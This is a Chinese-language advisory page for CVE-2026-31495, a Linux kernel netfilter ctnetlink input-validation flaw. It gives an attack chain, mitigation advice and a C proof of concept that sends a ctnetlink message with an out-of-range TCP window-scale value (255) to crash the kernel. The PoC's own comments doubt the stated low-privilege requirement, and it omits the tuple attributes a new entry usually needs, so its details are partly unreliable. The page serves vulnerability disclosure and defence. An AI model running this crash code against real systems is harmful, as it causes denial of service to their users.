CVE-2026-31495 CVSS 5.5 中危

CVE-2026-31495 Linux Kernel netfilter输入验证漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31495

漏洞类型

输入验证错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux kernel netfilter的ctnetlink组件存在输入验证漏洞。由于未正确限制TCP窗口缩放参数的范围，本地攻击者可利用特制netlink消息触发未定义行为，导致系统崩溃或拒绝服务。

技术细节

漏洞位于Linux内核的netfilter子系统，具体涉及ctnetlink的代码路径。该模块此前依赖手动验证来检查`CTA_PROTOINFO_TCP_WSCALE_ORIGINAL`等属性的范围，但存在逻辑疏漏。攻击者可发送包含非法WSCALE值（如255，超过最大限制14）的netlink消息。内核在处理时，将该值直接用作u32移位计数，导致超出位宽的移位操作，进而触发未定义行为，可能引发内核崩溃或拒绝服务。此外，部分状态值和标志位也缺乏掩码验证。修复方案是将这些验证逻辑转换为netlink策略注解，由netlink核心在早期拦截非法输入。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者获取目标系统的本地低权限用户访问权限。

STEP 2

2. 构造恶意Netlink消息

攻击者编写代码，通过netlink套接字构造一条包含恶意TCP窗口缩放参数（WSCALE设为255）的ctnetlink消息。

STEP 3

3. 发送特制数据包

将构造好的消息发送至内核的netfilter子系统。

STEP 4

4. 触发未定义行为

内核解析消息时，将超出范围的WSCALE值（255）用于u32位移操作，导致未定义行为。

STEP 5

5. 系统拒绝服务

触发内核崩溃或死锁，导致系统不可用（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31495
 * Trigger undefined behavior in ctnetlink via invalid TCP WSCALE.
 * Compile: gcc -o poc_cve202631495 poc_cve202631495.c -lmnl
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <libmnl/libmnl.h>
#include <linux/netfilter/nfnetlink_conntrack.h>

#define NFNL_SUBSYS_CTNETLINK 1

int main() {
    struct mnl_socket *nl;
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct nfgenmsg *nfh;

    nl = mnl_socket_open(NETLINK_NETFILTER);
    if (nl == NULL) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }

    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        exit(EXIT_FAILURE);
    }

    // Build Netlink Message Header
    nlh = mnl_nlmsg_put_header(buf);
    nlh->nlmsg_type = (NFNL_SUBSYS_CTNETLINK << 8) | IPCTNL_MSG_CT_NEW;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;
    nlh->nlmsg_seq = 1;

    // Add Netfilter Generic Header
    nfh = mnl_nlmsg_put_extra_header(nlh, sizeof(struct nfgenmsg));
    nfh->nfgen_family = AF_INET;
    nfh->version = NFNETLINK_V0;
    nfh->res_id = 0;

    // Add Nested Attribute: CTA_PROTOINFO
    struct nlattr *nest_proto = mnl_attr_nest_start(nlh, CTA_PROTOINFO);
    
    // Add Nested Attribute: CTA_PROTOINFO_TCP
    struct nlattr *nest_tcp = mnl_attr_nest_start(nlh, CTA_PROTOINFO_TCP);
    
    // Add Malicious Attribute: CTA_PROTOINFO_TCP_WSCALE_ORIGINAL
    // Valid max is 14, sending 255 to trigger undefined behavior (shift > 31)
    printf("[+] Sending malicious netlink message with WSCALE = 255...\n");
    mnl_attr_put_u8(nlh, CTA_PROTOINFO_TCP_WSCALE_ORIGINAL, 255);

    mnl_attr_nest_end(nlh, nest_tcp);
    mnl_attr_nest_end(nlh, nest_proto);

    // Send to Kernel
    if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
        perror("mnl_socket_sendto");
        // If sending fails due to permissions, the exploit requirement (PR:L) might
        // need specific capabilities, but the vulnerability logic remains.
        exit(EXIT_FAILURE);
    }

    printf("[+] Message sent. Check kernel logs for crash or errors.\n");
    mnl_socket_close(nl);
    return 0;
}

影响范围

Linux Kernel (修复提交 2ef71307c86a9f866d6e28f1a0c06e2e9d794474 之前)

防御指南

临时缓解措施

建议立即更新操作系统内核以修复该漏洞。如果无法立即更新，可通过禁用conntrack netlink接口或严格限制本地用户权限来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表